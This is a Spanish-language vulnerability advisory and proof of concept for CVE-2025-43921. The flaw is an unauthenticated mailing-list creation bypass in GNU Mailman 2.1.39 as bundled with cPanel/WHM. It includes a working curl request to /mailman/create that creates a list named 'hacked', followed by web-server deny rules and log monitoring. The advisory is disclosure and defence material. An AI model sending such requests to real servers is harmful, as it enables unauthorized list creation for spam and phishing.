
Exploit de prueba de concepto y aviso para CVE-2025-43921, una omisión de autenticación en GNU Mailman 2.1.39 que permite la creación no autenticada de listas de correo a través del endpoint CGI /mailman/create.
Descubierto por: Firudin Davudzada y Musazada Aydan
Fecha de divulgación: Abril 2025
ID de CVE: CVE-2025-43921
Gravedad: 5.3 Medio (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)
Tipo de ataque: Remoto
Software afectado: GNU Mailman 2.1.39 (incluido con cPanel/WHM)
GNU Mailman 2.1.39, tal como se incluye en cPanel y WHM, es vulnerable a una falla de omisión de autenticación que permite a atacantes no autenticados crear listas de correo a través del endpoint /mailman/create. El problema se debe a la falta de controles de acceso en el script CGI create, lo que permite a los atacantes abusar del sistema de correo para spam, phishing o agotamiento de recursos.
Esta vulnerabilidad se alinea con problemas históricos de control de acceso en Mailman, como permisos incorrectos de gestión de listas en Postorius. Puede encadenarse con CVE-2025-43920 para aumentar el impacto, creando una plataforma para ataques más amplios.
create (maneja solicitudes de creación de listas)Mailman/Handlers/ (lógica de gestión de listas)/mailman/create, permitiendo la creación arbitraria de listas.El siguiente comando crea una lista de correo llamada hacked:
curl http://target/mailman/create -d "listname=hacked&[email protected]&password=1234&confirm=1234"
Resultado esperado: Se crea una nueva lista de correo, controlable por el correo electrónico del propietario especificado por el atacante.
/mailman/create con parámetros diseñados para crear listas de correo.Bloquear el acceso al endpoint: Configurar el servidor web para restringir el acceso a /mailman/create:
location /mailman/create {
deny all;
return 403;
}
O para Apache:
<Location "/mailman/create">
Deny from all
</Location>
Monitorear registros: Verificar intentos no autorizados de creación de listas:
tail -f /var/log/mailman/* | grep "newlist"
/mailman/create para prevenir abusos.Firudin Davudzada y Musazada Aydan divulgaron responsablemente esta vulnerabilidad durante un compromiso de pruebas de penetración autorizado. Agradecimientos al equipo MITRE CVE por la coordinación.
Correo electrónico: [email protected]\